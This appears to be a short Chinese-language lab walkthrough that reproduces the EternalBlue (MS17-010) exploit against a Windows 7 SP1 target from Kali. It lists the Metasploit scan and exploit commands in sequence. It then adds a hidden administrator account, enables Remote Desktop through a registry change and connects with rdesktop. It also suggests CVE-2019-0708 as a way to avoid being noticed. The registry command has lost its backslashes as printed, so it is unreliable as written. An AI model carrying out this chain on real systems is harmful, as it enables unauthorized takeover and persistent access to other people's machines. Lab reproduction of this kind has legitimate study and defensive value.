­

利用ms17_010開啟3389端口

攻擊機kali

目標機win7 sp1(旗艦版)

當nmap或其他工具發現目標及上有445端口開啟,可以考慮檢測是否存在永恆之藍,使用msf中的永恆之藍檢測模塊

use auxiliary/scanner/smb/smb_ms17_010 設置目標IP或網段 set RHOSTS 192.168.194.129執行掃描 run

這裡可以看到可能存在,我們開始執行,得到shell,如果出現亂碼的話執行chcp 65001

use exploit/windows/smb/ms17_010_eternalblue 查看可設置的選項 show options 設置***目標ip set RHOST 192.168.194.129 執行攻擊exploit

然後我們創建用戶名密碼 blue/blue net user blue blue /add 將用戶blue添加入管理組 (不加入會連接不上) net localgroup administrators blue /add 開啟遠程桌面功能 REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f (實測沒問題) Kali遠程桌面連接Win7 rdesktop 192.168.194.129:3389(不在msf中執行)

這裡連接會在目標機器上得到提示,如果不管的話30秒後將默認選擇確定斷開

當點擊確定的話,可以連接成功

如果選擇取消將連接不上,但這樣的交互性太強了,容易被發現,因此開啟完3389端口後可以用metasploit中的cve-2019-0708模塊進行攻擊獲取shell(這裡前提是目標機不是普通的家庭版,要支持遠程連接),復現要將win7升級的激活碼,上網上隨便找就行

補充一下,如果這兩個漏洞復現不成功,可能是防火牆的原因,或者重啟一下(嘻嘻)

至此復現成功